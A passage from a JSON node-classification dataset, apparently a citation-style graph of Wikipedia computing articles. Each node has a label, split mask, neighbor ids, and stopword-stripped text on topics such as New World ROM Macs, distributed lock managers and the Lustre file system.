      6544,
      10641,
      403,
      2452,
      4502,
      2462,
      10658,
      421,
      10663,
      424,
      6570,
      10668,
      8622,
      431,
      432,
      10675,
      4535,
      444,
      8637,
      4543,
      4546,
      4547,
      2500,
      2501,
      4548,
      6597,
      10692,
      2506,
      8657,
      467,
      4565,
      2519,
      477,
      6622,
      2527,
      10719,
      10720,
      4578,
      4581,
      488,
      490,
      2539,
      4586,
      4587,
      8682,
      8687,
      2544,
      2545,
      8688,
      499,
      10734,
      502,
      8695,
      505,
      2556,
      508,
      8700,
      511,
      8702,
      515,
      4613,
      10757,
      6663,
      6664,
      8716,
      4621,
      2576,
      530,
      6675,
      6677,
      4630,
      8729,
      10779,
      10780,
      4637,
      8735,
      4641,
      2594,
      8737,
      10791,
      2602,
      8751,
      6706,
      563,
      10803,
      570,
      2619,
      4667,
      573,
      8763,
      10811,
      10813,
      2638,
      6738,
      598,
      2647,
      8792,
      6754,
      10856,
      2670,
      6769,
      6770,
      630,
      2680,
      639,
      2689,
      643,
      6787,
      10883,
      4743,
      4744,
      4748,
      6797,
      8850,
      2708,
      663,
      6808,
      667,
      8863,
      4768,
      2725,
      6821,
      8872,
      4777,
      6830,
      6831,
      6834,
      6840,
      8889,
      2746,
      2747,
      6850,
      8899,
      10949,
      8905,
      8913,
      724,
      8916,
      731,
      10972,
      2782,
      6878,
      8928,
      2786,
      8937,
      10985,
      6893,
      6895,
      2804,
      8948,
      758,
      2811,
      2813,
      4862,
      6909,
      780,
      6926,
      4880,
      8976,
      8977,
      789,
      791,
      793,
      2842,
      8985,
      8987,
      6942,
      4895,
      11040,
      6947,
      4900,
      6949,
      2855,
      808,
      4906,
      4913,
      819,
      823,
      9016,
      4921,
      9019,
      9020,
      4930,
      835,
      11075,
      9031,
      4938,
      6993,
      9050,
      859,
      11099,
      862,
      863,
      2910,
      7008,
      11106,
      868,
      875,
      11116,
      4979,
      2933,
      7033,
      11136,
      4996,
      9092,
      4998,
      7053,
      5006,
      7055,
      11153,
      918,
      5015,
      9112,
      921,
      5022,
      7071,
      5028,
      9126,
      936,
      940,
      9135,
      7088,
      9137,
      11184,
      2995,
      9139,
      11187,
      953,
      955,
      964,
      970,
      9166,
      3025,
      11217,
      5078,
      9179,
      11232,
      9189,
      9194,
      9195,
      3055,
      11255,
      7162,
      7164,
      7173,
      1031,
      1041,
      7188,
      3093,
      7199,
      9248,
      7201,
      7202,
      7204,
      5160,
      1067,
      7217,
      7218,
      3123,
      5172,
      1083,
      11333,
      9286,
      1099,
      3148,
      7248,
      3153,
      5202,
      11344,
      11347,
      7254,
      5207,
      1112,
      9302,
      5210,
      1115,
      5220,
      5222,
      9323,
      5235,
      1141,
      1142,
      3196,
      7292,
      7303,
      9351,
      5258,
      7306,
      1168,
      9361,
      11411,
      7317,
      9365,
      11416,
      1178,
      5277,
      7325,
      1186,
      5285,
      3238,
      11431,
      3241,
      3244,
      5293,
      11438,
      9391,
      3249,
      7345,
      1205,
      9397,
      3255,
      11447,
      7354,
      11450,
      7356,
      11454,
      7360,
      1219,
      9415,
      1235,
      5332,
      3294,
      1247,
      3295,
      9445,
      3304,
      9449,
      9455,
      3315,
      5363,
      7412,
      11507,
      5368,
      11513,
      5371,
      5375,
      9472,
      1282,
      5378,
      1287,
      5384,
      1289,
      7432,
      3343,
      11539,
      1309,
      11550,
      3359,
      5409,
      1315,
      5414,
      5416,
      1324,
      7477,
      9525,
      3387,
      3389,
      7486,
      5439,
      5440,
      9541,
      7495,
      5448,
      11593,
      5450,
      11596,
      3405,
      1359,
      11600,
      3410,
      7507,
      5460,
      5463,
      7514,
      11613,
      1376,
      9569,
      7522,
      1380,
      3429,
      3430,
      3431,
      5480,
      5481,
      9580,
      11631,
      3443,
      5491,
      1397,
      5492,
      5495,
      1400,
      3449,
      3451,
      5499,
      11645,
      9599,
      3459,
      1415,
      7561,
      11661,
      5518,
      3472,
      9617,
      5523,
      9619,
      3477,
      7576,
      3481,
      11673,
      9629,
      9630,
      9631,
      1440,
      9633,
      11681,
      9635,
      3493,
      9637,
      9639,
      7592,
      11693,
      7601,
      3510,
      7607,
      3514,
      1467,
      1469,
      9665,
      3527,
      1480,
      5577,
      5580,
      3533,
      7630,
      5585,
      7635,
      5596,
      1502,
      5603,
      5606,
      3560,
      5609,
      5612,
      7663,
      3571,
      5619,
      1531,
      5627,
      5629,
      3582,
      1535,
      9724,
      5642,
      9739,
      5644,
      1560,
      5658,
      1563,
      9762,
      7715,
      5677,
      1584,
      9776,
      7733,
      5689,
      3646,
      9791,
      1606,
      3655,
      9801,
      1611,
      9804,
      1614,
      9811,
      9820,
      3677,
      5728,
      9825,
      7780,
      7781,
      1638,
      3686,
      9829,
      9836,
      9838,
      5744,
      5750,
      5756,
      9854,
      3711,
      3717,
      5767,
      9863,
      7818,
      7820,
      7822,
      5782,
      3735,
      7836,
      5789,
      9886,
      5793,
      9893,
      1702,
      7849,
      3759,
      3760,
      3762,
      9907,
      3764,
      1723,
      3771,
      1725,
      3774,
      9919,
      9920,
      1730,
      1736,
      5833,
      7881,
      1740,
      9934,
      7887,
      1746,
      9939,
      1750,
      9946,
      5855,
      5856,
      1761,
      5857,
      7905,
      3816,
      1776,
      1780,
      9974,
      1784,
      5881,
      7936,
      3841,
      7939,
      9993,
      1802,
      9996,
      1806,
      3856,
      1810,
      3862,
      5910,
      3867,
      10014,
      7983,
      5939,
      3894,
      10038,
      5944,
      10040,
      3904,
      10051,
      5956,
      1861,
      3909,
      3911,
      10055,
      1869,
      10063,
      1874,
      8021,
      10072,
      1883,
      5979,
      8031,
      3938,
      10090,
      1901,
      8046,
      1907,
      6003,
      6004,
      8052,
      6007,
      3960,
      3966,
      8063,
      3974,
      8070,
      8073,
      10122,
      1933,
      8077,
      6033,
      6036,
      1943,
      8092,
      1952,
      6051,
      8100,
      1957,
      8102,
      10148,
      10151,
      4011,
      1964,
      4014,
      4017,
      8115,
      4021,
      1976,
      6072,
      8120,
      8122,
      4030,
      1985,
      6084,
      10180,
      8136,
      8139,
      10190,
      4048,
      2002,
      10195,
      4052,
      8154,
      2016,
      8164,
      10214,
      8170,
      8175,
      2036,
      10230,
      10235,
      8188
    ],
    "mask": "None"
  },
  {
    "node_id": 3324,
    "label": 2,
    "text": "New_World_ROM:new world rom new world rom computers macintosh models use macintosh toolbox rom logic board due mac os x requiring availability toolbox allowed rom sizes shrink dramatically typically facilitated use flash memory system firmware instead expensive less flexible mask rom previous macs used facility loading toolbox startup device however made available allowing use mac os 8 mac os 9 new world machines new world architecture developed macintosh network computer unrealized project eventually contributed several key technologies first-generation imac powerpc macs imac ibook blue white power mac g3 bronze keyboard lombard powerbook g3 forward new world rom machines previous models including beige power mac g3 beige platinum macs old world rom machines intel based macs incapable running mac os 9 machines efi used instead open firmware new world old world machines based new world rom macs first macs direct usage open firmware subsystem encouraged previous pci power macs used open firmware booting implementation complete machines expected probe pci devices immediately hand control mac os rom versions 1.0.5 2.x several serious bugs well missing functionality able load files hfs partition tftp server apple also set default input output devices ttya modem port beige macs made difficult normal users get open firmware necessary either hook terminal change open firmware settings inside mac os using tool boot variables apple system disk new world rom introduced much-improved version open firmware interpreter version 3.0 added many missing features fixed bugs earlier versions capability run chrp boot scripts toolbox rom embedded inside chrp script system folder called mac os rom along short loader stub copy happy mac icon suitable display open firmware rom loaded disk mac boot sequence continued usual open firmware could also run binary boot loader version 3.0 added support elf objects well xcoff files versions 1.0.5 2.0 supported also version 3.0 well last releases version 2.x starting powerbook 3400 officially supported direct access open firmware command prompt console setting auto-boot variable false mac os holding command-option-o-f boot one major difference old world rom macs new world rom macs least classic mac os gestalt selector machine type longer usable new world rom macs use mach id 406 decimal actual machine id encoded model compatible properties root node open firmware device tree new world rom also sets compatible property root node macrisc2 machines boot classic mac os using mac os rom macrisc3 machines boot mac os x another unix-like system somewhat easier boot non-mac-os operating system new world system indeed openbsd bootloader works new world system simplest way distinguish new world rom mac factory built-in usb port old world rom mac usb port factory equipment instead used adb keyboard mouse mini-din-8 modem printer serial ports peripherals also new world rom macs generally built-in floppy drive",
    "neighbors": [
      1542,
      3598,
      5520,
      10130,
      5397,
      11037,
      6048,
      11171,
      10149,
      3371,
      8114,
      1592,
      576,
      10432,
      713,
      9035,
      209,
      3410,
      213,
      5976,
      3167,
      9700,
      4581,
      6377,
      4844,
      10481,
      499,
      5619,
      6771,
      7163,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3325,
    "label": 3,
    "text": "Bandit_Kings_of_Ancient_China:bandit kings ancient china bandit kings ancient china also known japan turn-based strategy video game developed published koei released 1989 ms-dos amiga macintosh 1990 nintendo entertainment system 1996 koei issued remake japanese sega saturn sony playstation featuring vastly improved graphics new arrangements original songs based great classical novel water margin game takes place ancient china reign emperor huizong song dynasty bandit kings ancient china—a band ten bandits—engage war china minister war gao qiu evil person unlimited power objective game build sustain command army troops capture gao qiu jurchen invasion january 1127 players hold certain attributes strength dexterity wisdom players must also deal situations taxes care troops maintenance replacement weapons equipment forces nature troop unrest desertion battlefields take place hexagonal grids players move armies across various terrain order strategically engage defeat enemy army troops capability fighting either melee weapons bows arrows magic dueling swords player defeats enemy army option recruiting imprisoning exiling executing captured enemy troops attacker 30 days win castles defeat deployed enemy commanders automatically defeated game ends defeat player game calendar hit january 1127 game map shows empire composed 48 prefectures prefecture may invaded adjacent territory exception imperial capital kaifeng player must built sufficient popularity gain attention emperor confer imperial decree permitting player march capital reviewing nes version bandit kings ancient china nintendo power suggested players might find game pace slow compared action-oriented games others would enjoy game depth involvement attention detail compute magazine praised game one complete entertaining role-playing simulations available gave honorable mention war/strategy category 1991 compute choice awards reviewer austin american-statesman suggested game depth overwhelming calling game richest complex role-playing game ever published saying trouble figuring ... supposed pc magazine reviewed game positively concluding bandit kings ancient china addictive game brought alive mixture computer-driven personalities romance departed culture large battery options unpredictability game play computer gaming world gave game three five stars 1990 two stars 1993 amiga version received positive reviews amiga magazines game reviewed 1994 dragon 211 jay dee eye monitor column reviewers gave game 3½ 5 stars computer gaming world named bandit kings ancient china antagonist gao qiu twelfth memorable game villain",
    "neighbors": [
      11477,
      9166,
      9006,
      10999
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3326,
    "label": 7,
    "text": "Distributed_lock_manager:distributed lock manager operating systems use lock managers organise serialise access resources distributed lock manager dlm runs every machine cluster identical copy cluster-wide lock database way dlm provides software applications distributed across cluster multiple machines means synchronize accesses shared resources dlms used foundation several successful clustered file systems machines cluster use storage via unified file system significant advantages performance availability main performance benefit comes solving problem disk cache coherency participating computers dlm used file locking also coordination disk access vmscluster first clustering system come widespread use relies openvms dlm way dec vms virtual memory system first widely available operating system implement dlm became available version 4 although user interface single-processor lock manager first implemented version 3 dlm uses generalized concept resource entity shared access must controlled relate file record area shared memory anything else application designer chooses hierarchy resources may defined number levels locking implemented instance hypothetical database might define resource hierarchy follows process acquire locks database whole particular parts database lock must obtained parent resource subordinate resource locked process running within vmscluster may obtain lock resource six lock modes granted determine level exclusivity granted possible convert lock higher lower level lock mode processes unlocked resource system information resource destroyed following truth table shows compatibility lock mode others process obtain lock resource enqueueing lock request similar qio technique used perform i/o enqueue lock request either complete synchronously case process waits lock granted asynchronously case ast occurs lock obtained also possible establish blocking ast triggered process obtained lock preventing access resource another process original process optionally take action allow access e.g demoting releasing lock lock value block associated resource read process obtained lock resource null lock updated process obtained protected update exclusive lock used hold information resource application designer chooses typical use hold version number resource time associated entity e.g database record updated holder lock increments lock value block another process wishes read resource obtains appropriate lock compares current lock value value last time process locked resource value process knows associated entity updated since last time read therefore unnecessary read hence technique used implement various types cache database similar application one processes obtained locks resources possible produce situation preventing another obtaining lock none proceed known deadlock e. w. dijkstra originally called deadly embrace simple example process 1 obtained exclusive lock resource process 2 obtained exclusive lock resource b process 1 tries lock resource b wait process 2 release process 2 tries lock resource processes wait forever openvms dlm periodically checks deadlock situations example second lock enqueue request one processes would return deadlock status would process take action resolve deadlock—in case releasing first lock obtained red hat oracle developed clustering software linux ocfs2 oracle cluster file system added official linux kernel version 2.6.16 january 2006 alpha-quality code warning ocfs2 removed 2.6.19 red hat cluster software including dlm gfs2 officially added linux kernel version 2.6.19 november 2006 systems use dlm modeled venerable vms dlm oracle dlm simpler api core function codice_1 eight parameters whereas vms service red hat dlm_lock 11 dlm implementations include following",
    "neighbors": [
      3328,
      7816,
      2314,
      6669,
      2322,
      1049,
      7581,
      2974,
      9762,
      2339,
      7983,
      7347,
      823,
      5441,
      3398,
      4423,
      7750,
      7499,
      11343,
      3795,
      2901,
      3289,
      11612,
      9060,
      9069,
      10733,
      9455,
      118
    ],
    "mask": "Test"
  },
  {
    "node_id": 3327,
    "label": 7,
    "text": "Content_Guru:content guru content guru cloud communications provider based bracknell uk provides services 30 countries storm platform direct partners vodafone kpn signed five-year renewal june 2017 deliver storm services across benelux region april 2016 content guru received queen award innovation storm contact multi-channel cloud contact centre solution contact used organisations across multiple sectors connect customers information devices choose notable clients including national health service serco sodexo travisperkins recognition solution deployed national health service nhs content guru several awards including vertical application solution year europa awards 2019 best use cloud services uk industry awards 2015 2016 best class digital transformation uk cloud awards 2017 best public sector digital project computing technology leaders award 2017 content guru founded 2005 sean martin taylor sister company hardware manufacturer software developer redwood technologies 2010 company storm platform used comres behalf itv news provide live audience polling first televised election leaders debate build-up uk 2010 general election 2013 content guru co-founded berkshire community foundation bcf business philanthropy club bpc enables businesses berkshire provide funding grassroots organisations projects local communities content guru sponsor along parent company redwood technologies group lead organiser pride bracknell forest awards since 2016 company announced would delivering services united states world largest contact centre market march 2017 later year august content guru vodafone handled 16,000 student enquiries ucas uk higher education applications service.. 2015 2016 2017 content guru positioned challenger gartner magic quadrant ccaas contact center service western europe january 2018 minority stake content guru sister company redwood technologies group sold scottish equity partners £25 million cash deal content guru announced partnership rakuten communications february 2018 deliver cloud contact centre services japan company came fire role manchester arena bombing may 2017 storm telecommunications platform failed operate resulted affected attack able contact police emergency services vodafone subcontracted services content guru providing national mutual aid telephony system however tried use found inability amend recorded message technical difficulties server suggests inadequate level knowledge expertise within vodafone sub-contractor content guru vodafone content guru continue partnership vodafone marketing content guru platform brand vodafone storm",
    "neighbors": [
      8934
    ],
    "mask": "None"
  },
  {
    "node_id": 3328,
    "label": 6,
    "text": "Lustre_(file_system):lustre file system lustre type parallel distributed file system generally used large-scale cluster computing name lustre portmanteau word derived linux cluster lustre file system software available gnu general public license version 2 provides high performance file systems computer clusters ranging size small workgroup clusters large-scale multi-site clusters lustre file systems high performance capabilities open licensing often used supercomputers since june 2005 consistently used least half top ten 60 top 100 fastest supercomputers world including world 2 3 ranked top500 supercomputers 2014 titan sequoia lustre file systems scalable part multiple computer clusters tens thousands client nodes tens petabytes pb storage hundreds servers terabyte per second tb/s aggregate i/o throughput makes lustre file systems popular choice businesses large data centers including industries meteorology simulation oil gas life science rich media finance i/o performance lustre widespread impact applications attracted broad attention lustre file system architecture started research project 1999 peter j. braam staff carnegie mellon university cmu time braam went found company cluster file systems 2001 starting work intermezzo file system coda project cmu lustre developed accelerated strategic computing initiative path forward project funded united states department energy included hewlett-packard intel september 2007 sun microsystems acquired assets cluster file systems inc. including intellectual property sun included lustre high-performance computing hardware offerings intent bring lustre technologies sun zfs file system solaris operating system november 2008 braam left sun microsystems eric barton andreas dilger took control project 2010 oracle corporation way acquisition sun began manage release lustre december 2010 oracle announced would cease lustre 2.x development place lustre 1.8 maintenance-only support creating uncertainty around future development file system following announcement several new organizations sprang provide support development open community development model including whamcloud open scalable file systems inc. opensfs european open file systems eofs others end 2010 lustre developers left oracle braam several associates joined hardware-oriented xyratex acquired assets clusterstor barton dilger others formed software startup whamcloud continued work lustre august 2011 opensfs awarded contract lustre feature development whamcloud contract covered completion features including improved single server metadata performance scaling allows lustre better take advantage many-core metadata server online lustre distributed filesystem checking lfsck allows verification distributed filesystem state data metadata servers filesystem mounted use distributed namespace environment dne formerly clustered metadata cmd allows lustre metadata distributed across multiple servers development also continued zfs-based back-end object storage lawrence livermore national laboratory features lustre 2.2 2.4 community release roadmap november 2011 separate contract awarded whamcloud maintenance lustre 2.x source code ensure lustre code would receive sufficient testing bug fixing new features developed july 2012 whamcloud acquired intel whamcloud fastforward doe contract extend lustre exascale computing systems 2018 timeframe opensfs transitioned contracts lustre development intel february 2013 xyratex ltd. announced acquired original lustre trademark logo website associated intellectual property oracle june 2013 intel began expanding lustre usage beyond traditional hpc within hadoop 2013 whole opensfs announced request proposals rfp cover lustre feature development parallel file system tools addressing lustre technical debt parallel file system incubators opensfs also established lustre community portal technical site provides collection information documentation one area reference guidance support lustre open source community april 8 2014 ken claffey announced xyratex/seagate donating domain back user community completed march 2015 june 2018 lustre team assets acquired intel ddn ddn organized new acquisition independent division reviving whamcloud name new division lustre file system first installed production use march 2003 mcr linux cluster lawrence livermore national laboratory one largest supercomputers time lustre 1.0.0 released december 2003 provided basic lustre filesystem functionality including server failover recovery lustre 1.2.0 released march 2004 worked linux kernel 2.6 size glimpse feature avoid lock revocation files undergoing write client side data write-back cache accounting grant lustre 1.4.0 released november 2004 provided protocol compatibility versions could use infiniband networks could exploit extents/mballoc ldiskfs on-disk filesystem lustre 1.6.0 released april 2007 allowed mount configuration “ mountconf ” allowing servers configured mkfs mount allowed dynamic addition object storage targets osts enabled lustre distributed lock manager ldlm scalability symmetric multiprocessing smp servers provided free space management object allocations lustre 1.8.0 released may 2009 provided oss read cache improved recovery face multiple failures added basic heterogeneous storage management via ost pools adaptive network timeouts version-based recovery transition release interoperable lustre 1.6 lustre 2.0 lustre 2.0 released august 2010 based significant internally restructured code prepare major architectural advancements lustre 2.x clients interoperate 1.8 earlier servers however lustre 1.8.6 later clients interoperate lustre 2.0 later servers metadata target mdt ost on-disk format 1.8 upgraded 2.0 later without need reformat filesystem lustre 2.1 released september 2011 community-wide initiative response oracle suspending development lustre 2.x releases added ability run servers red hat linux 6 increased maximum ext4-based ost size 24 tb 128 tb well number performance stability improvements lustre 2.1 servers remained inter-operable 1.8.6 later clients lustre 2.2 released march 2012 focused providing metadata performance improvements new features added parallel directory operations allowing multiple clients traverse modify single large directory concurrently faster recovery server failures increased stripe counts single file across 2000 osts improved single-client directory traversal performance lustre 2.3 released october 2012 continued improve metadata server code remove internal locking bottlenecks nodes many cpu cores 16 object store added preliminary ability use zfs backing file system lustre file system check lfsck feature verify repair mds object index oi file system use file-level backup/restore case mds corruption server-side io statistics enhanced allow integration batch job schedulers slurm track per-job statistics client-side software updated work linux kernels version 3.0 lustre 2.4 released may 2013 added considerable number major features many funded directly opensfs distributed namespace environment dne allows horizontal metadata capacity performance scaling 2.4 clients allowing subdirectory trees single namespace located separate mdts zfs used backing filesystem mdt ost storage lfsck feature added ability scan verify internal consistency mdt fid linkea attributes network request scheduler nrs adds policies optimize client request processing disk ordering fairness clients optionally send bulk rpcs 4 mb size client-side software updated work linux kernels version 3.6 still interoperable 1.8 clients lustre 2.5 released october 2013 added highly anticipated feature hierarchical storage management hsm core requirement enterprise environments hsm allows customers easily implement tiered storage solutions operational environment release current opensfs-designated maintenance release branch lustre recent maintenance version 2.5.3 released september 2014 lustre 2.6 released july 2014 modest release feature wise adding lfsck functionality local consistency checks ost well consistency checks mdt ost objects nrs token bucket filter tbf policy added single-client io performance improved previous releases release also added preview dne striped directories allowing single large directories stored multiple mdts improve performance scalability lustre 2.7 released march 2015 added lfsck functionality verify dne consistency remote striped directories multiple mdts dynamic lnet config adds ability configure modify lnet network interfaces routes routers runtime new evaluation feature added uid/gid mapping clients different administrative domains along improvements dne striped directory functionality lustre 2.8 released march 2016 finished dne striped directory feature including support migrating directories mdts cross-mdt hard link rename well included improved support security-enhanced linux selinux client kerberos authentication rpc encryption network performance improvements lfsck lustre 2.9 released december 2016 included number features related security performance shared secret key security flavour uses gssapi mechanism kerberos provide client server node authentication rpc message integrity security encryption nodemap feature allows categorizing client nodes groups mapping uid/gid clients allowing remotely administered clients transparently use shared filesystem without single set uid/gids client nodes subdirectory mount feature allows clients mount subset filesystem namespace mds release also added support 16mib rpcs efficient i/o submission disk added codice_1 interface allow clients provide i/o hints servers prefetch file data server cache flush file data server cache improved support specifying filesystem-wide default ost pools improved inheritance ost pools conjunction file layout parameters lustre 2.10 released july 2017 number significant improvements lnet multi-rail lmr feature allows bonding multiple network interfaces infiniband omni-path and/or ethernet client server increase aggregate i/o bandwidth file layouts constructed multiple components based file offset allow different parameters stripe count ost pool etc determined based file size nrs token bucket filter tbf server-side scheduler implemented new rule types including rpc-type scheduling ability specify multiple parameters jobid nid rule matching tools managing zfs snapshots lustre filesystems added simplify creation mounting management mdt ost zfs snapshots separate lustre mountpoints lustre 2.11 released april 2018 contains two significant new features several smaller features file level redundancy flr feature expands 2.10 pfl implementation adding ability specify mirrored file layouts improved availability case storage server failure and/or improved performance highly concurrent reads data-on-mdt dom feature allows small mib files stored mdt leverage typical flash-based raid-10 storage lower latency reduced io contention instead typical hdd raid-6 storage used osts well lnet dynamic discovery feature allows auto-configuration lnet multi-rail peers share lnet network ldlm lock ahead feature allows appropriately modified applications libraries pre-fetch dlm extent locks osts files application knows predicts file extent modified near future reduce lock contention multiple clients writing file lustre 2.12 released december 21 2018 focused improving lustre usability stability improvements performance functionality flr dom features added lustre 2.11 well smaller changes nrs tbf hsm jobstats added lnet network health allow lnet multi-rail feature lustre 2.10 better handle network faults node multiple network interfaces lazy size mdt lsom feature allows storing estimate file size mdt use policy engines filesystem scanners management tools efficiently make decisions files without fully accurate file sizes blocks count without query osts information release also added ability manually restripe existing directory across multiple mdts allow migration directories large numbers files use capacity performance several mds nodes lustre rpc data checksum added scsi t10-pi integrated data checksums client kernel block layer scsi host adapter t10-enabled hard drives lustre file system three major functional units mdt ost client may node usually testing purposes typical production installations devices separate nodes communicating network mdt ost may part single filesystem though possible multiple mdts osts single node part different filesystems lustre network lnet layer use several types network interconnects including native infiniband verbs omni-path roce iwarp via ofed tcp/ip ethernet proprietary network technologies cray gemini interconnect lustre 2.3 earlier myrinet quadrics cray seastar rapidarray networks also supported network drivers deprecated networks longer commercially available support removed completely lustre 2.8 lustre take advantage remote direct memory access rdma transfers available improve throughput reduce cpu usage storage used mdt ost backing filesystems normally provided hardware raid devices though work block devices since lustre 2.4 mdt ost also use zfs backing filesystem addition ext4 allowing effectively use jbod storage instead hardware raid devices lustre oss mds servers read write modify data format imposed backing filesystem return data clients allows lustre take advantage improvements features underlying filesystem compression data checksums zfs clients direct access underlying storage ensures malfunctioning malicious client corrupt filesystem structure ost dedicated filesystem exports interface byte ranges file objects read/write operations extent locks protect data consistency mdt dedicated filesystem stores inodes directories posix extended file attributes controls file access permissions/acls tells clients layout object make regular file mdts osts currently use either enhanced version ext4 called ldiskfs zfs/dmu back-end data storage store files/objects using open source zfs-on-linux port client mounts lustre filesystem locally vfs driver linux kernel connects client server upon initial mount client provided file identifier fid root directory mountpoint client accesses file performs filename lookup mds mds filename lookup complete user client permission access and/or create file either layout existing file returned client new file created behalf client requested read write operations client interprets file layout logical object volume lov layer maps file logical offset size one objects client locks file range operated executes one parallel read write operations directly oss nodes hold data objects approach bottlenecks client-to-oss communications eliminated total bandwidth available clients read write data scales almost linearly number osts filesystem initial lookup file layout mds normally involved file io operations since block allocation data io managed internally ost clients directly modify objects data ost filesystems instead delegate task oss nodes approach ensures scalability large-scale clusters supercomputers well improved security reliability contrast shared block-based filesystems gpfs ocfs allow direct access underlying storage clients filesystem requires large back-end san attached clients increases risk filesystem corruption misbehaving/defective clients typical lustre installation linux client lustre filesystem driver module loaded kernel filesystem mounted like local network filesystem client applications see single unified filesystem even though may composed tens thousands individual servers mdt/ost filesystems massively parallel processor mpp installations computational processors access lustre file system redirecting i/o requests dedicated i/o node configured lustre client approach used blue gene installation lawrence livermore national laboratory another approach used early years lustre liblustre library cray xt3 using catamount operating system systems sandia red storm provided userspace applications direct filesystem access liblustre user-level library allows computational processors mount use lustre file system client using liblustre computational processors could access lustre file system even service node job launched linux client liblustre allowed data movement directly application space lustre osss without requiring intervening data copy kernel thus providing access computational processors lustre file system directly constrained operating environment liblustre functionality deleted lustre 2.7.0 disabled since lustre 2.6.0 untested since lustre 2.3.0 linux kernel version 4.18 incomplete port lustre client removed kernel staging area order speed development porting newer kernels out-of-tree lustre client server still available rhel sles ubuntu distro kernels well vanilla kernels traditional unix disk file system inode data structure contains basic information file data contained file stored lustre file system also uses inodes inodes mdts point one ost objects associated file rather data blocks objects implemented files osts client opens file file open operation transfers set object identifiers layout mds client client directly interact oss node object stored allows client perform i/o parallel across ost objects file without communication mds one ost object associated mdt inode object contains data lustre file one object associated file data file striped chunks round-robin manner across ost objects similar raid 0 striping file multiple ost objects provides significant performance benefits need high bandwidth access single large file striping used maximum file size limited size single target capacity aggregate i/o bandwidth scale number osts file striped also since locking object managed independently ost adding stripes one per ost scales file i/o locking capacity file proportionately file created filesystem may specify different layout parameters stripe count number ost objects making file stripe size unit data stored ost moving next ost selection performance capacity tuned optimally file many application threads reading writing separate files parallel optimal single stripe per file since application providing parallelism many threads reading writing single large file concurrently optimal one stripe ost maximize performance capacity file lustre 2.10 release ability specify composite layouts added allow files different layout parameters different regions file progressive file layout pfl feature uses composite layouts improve file io performance wider range workloads well simplify usage administration example small pfl file single stripe low access overhead larger files many stripes high aggregate bandwidth better ost load balancing composite layouts enhanced 2.11 release file level redundancy flr feature allows file multiple overlapping layouts file providing raid 0+1 redundancy files well improved read performance lustre 2.11 release also added data-on-metadata dom feature allows first component pfl file stored directly mdt inode reduces overhead accessing small files terms space usage ost object needed well network usage fewer rpcs needed access data dom also improves performance small files mdt ssd-based osts disk-based client initially mounts filesystem provided 128-bit lustre file identifier fid composed 64-bit sequence number 32-bit object id 32-bit version root directory mountpoint filename lookup client performs lookup pathname component mapping parent directory fid sequence number specific mdt via fid location database fldb lookup mds managing mdt using parent fid filename mds return fid requested pathname component along dlm lock mdt last parent directory determined directory operations non-striped directories take place exclusively mdt avoiding contention mdts dne striped directories per-directory layout stored parent directory provides hash function list mdt directory fids across directory distributed logical metadata volume lmv client hashes filename maps specific mdt directory shard handle operations file identical manner non-striped directory readdir operations entries directory shard returned client sorted local mdt directory hash order client performs merge sort interleave filenames hash order single 64-bit cookie used determine current offset within directory lustre distributed lock manager ldlm implemented openvms style protects integrity file data metadata access modification lustre file completely cache coherent among clients metadata locks managed mdt stores inode file using fid resource name metadata locks split separate bits protect lookup file file owner group permission mode access control list acl state inode directory size directory contents link count timestamps layout file striping since lustre 2.4 extended attributes xattrs since lustre 2.5 client fetch multiple metadata lock bits single inode single rpc request currently ever granted read lock inode mds manages modifications inode order avoid lock resource contention currently node gets write locks inodes file data locks managed ost object file striped using byte-range extent locks clients granted overlapping read extent locks part file allowing multiple concurrent readers file and/or non-overlapping write extent locks independent regions file allows many lustre clients access single file concurrently read write avoiding bottlenecks file i/o practice linux clients manage data cache units pages clients request locks always integer multiple page size 4096 bytes clients client requesting extent lock ost may grant lock larger extent originally requested order reduce number lock requests client makes actual size granted lock depends several factors including number currently granted locks object whether conflicting write locks requested lock extent number pending lock requests object granted lock never smaller originally requested extent ost extent locks use lustre fid object resource name lock since number extent lock servers scales number osts filesystem also scales aggregate locking performance filesystem single file striped multiple osts communication lustre clients servers implemented using lustre networking lnet originally based sandia portals network programming application programming interface disk storage connected lustre mds oss server nodes using direct attached storage sas fc iscsi traditional storage area network san technologies independent client-to-server network lnet use many commonly used network types infiniband tcp commonly ethernet networks allows simultaneous availability across multiple network types routing remote direct memory access rdma used data metadata transfer nodes provided underlying networks infiniband roce iwarp omni-path high availability recovery features enable transparent recovery conjunction failover servers since lustre 2.10 lnet multi-rail mr feature allows link aggregation two network interfaces client server improve bandwidth lnet interface types need network type 2.12 multi-rail enhanced improve fault tolerance multiple network interfaces available peers lnet provides end-to-end throughput gigabit ethernet networks excess 100 mb/s throughput 3 gb/s using infiniband quad data rate qdr links throughput 1 gb/s across 10 gigabit ethernet interfaces lustre file system high availability features include robust failover recovery mechanism making server failures reboots transparent version interoperability successive minor versions lustre software enables server upgraded taking offline failing standby server performing upgrade restarting active jobs continue run experiencing delay backup server takes storage lustre mdses configured active/passive pair one active/active mds pairs dne osses typically deployed active/active configuration provides redundancy without extra overhead often standby mds one filesystem mgs and/or monitoring node active mds another file system nodes idle cluster lustre provides capability multiple storage tiers within single filesystem namespace allows traditional hsm functionality copy archive files primary filesystem secondary archive storage tier archive tier typically tape-based system often fronted disk cache file archived released main filesystem leaving stub references archive copy released file opened coordinator blocks open sends restore request copytool completes open copytool completed restoring file addition external storage tiering possible multiple storage tiers within single filesystem namespace osts different types e.g hdd ssd declared named storage pools ost pools selected specifying file layouts different pools used within single pfl file layout files migrated storage tiers either manually control policy engine since lustre 2.11 also possible mirror file different ost pools flr file layout example pre-stage files flash computing job hsm includes additional lustre components manage interface primary filesystem archive hsm also defines new states files including lustre used many top500 supercomputers large multi-cluster sites six top 10 60 top 100 supercomputers use lustre file systems include k computer riken advanced institute computational science tianhe-1a national supercomputing center tianjin china jaguar titan oak ridge national laboratory ornl blue waters university illinois sequoia blue gene/l lawrence livermore national laboratory llnl also large lustre filesystems national energy research scientific computing center pacific northwest national laboratory texas advanced computing center brazilian national laboratory scientific computing nasa north america asia tokyo institute technology europe cea many others commercial technical support lustre often bundled along computing system storage hardware sold vendor vendors include cray dell hewlett-packard hp storageworks scalable file share circa 2004 2008 groupe bull silicon graphics international fujitsu vendors selling storage hardware bundled lustre support include hitachi data systems datadirect networks ddn netapp seagate technology others also possible get software-only support lustre file systems vendors including whamcloud amazon web services offers amazon fsx lustre fully managed service making easy launch run high-performance file systems cost effectively cloud",
    "neighbors": [
      5120,
      9731,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
